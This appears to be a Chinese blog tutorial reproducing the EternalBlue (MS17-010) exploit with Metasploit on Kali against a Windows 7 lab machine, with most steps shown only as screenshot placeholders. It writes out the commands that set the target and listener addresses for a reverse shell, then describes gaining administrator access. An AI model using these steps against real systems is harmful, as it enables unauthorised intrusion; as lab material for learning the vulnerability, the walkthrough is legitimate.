Kali中MSF利用永恒之蓝(复现)

Kali中MSF利用永恒之蓝(复现)

1、进入MSF框架:

image-20240613211232940

2、搜索MS17_010漏洞:

image-20240613211358399

这里找到了四个模块:0、1、4是漏洞利用模块;2、3是辅助模块,主要探测主机是否存在MS17_010漏洞。

3、利用Auxiliary辅助探测模块对漏洞进行探测(查看下所需要的参数):

image-20240613211421447

4、设置要探测的远程目标(两种方式探测):

(有[+]号的就是可能存在漏洞的主机,这里有1个主机存在漏洞)

image-20240613211446016

5、设置Exploit漏洞利用模块利用‘ms17_010_eternalblue’,并查看可攻击的系统平台来显示当前攻击模块针对哪些特定操作系统版本:

image-20240613211502816

image-20240613211510801

6、设置Payload攻击载荷模块(重点):

image-20240613211528835

7、查看该模块下所需要的参数:

image-20240613211544799

8、参数设置:

set RHOST 192.168.126.129     #设置RHOST,也就是要攻击主机的ip

set LHOST 192.168.126.134     #设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell

set lport 7777           #设置lport,也就是我们主机的端口,反弹shell到这个端口;如果我们这里不设置lport的话,默认是4444端口监听;

image-20240613211630619

9、进行攻击:

(写run或者exploit都行)

image-20240613211644230

10、漏洞利用:

image-20240613211655285

在这里呢由于我们是通过系统的内核漏洞渗透进Windows7,输入getuid进行查看,得知当前权限为管理员权限。

ps查看肉鸡进程,说明了该漏洞是利用Windows上的spoolsv.exe进程实现的,且权限很高:

image-20240613211710912

image-20240613211719696

posted @ 2024-06-16 23:03  gcc_com  阅读(20)  评论(0编辑  收藏  举报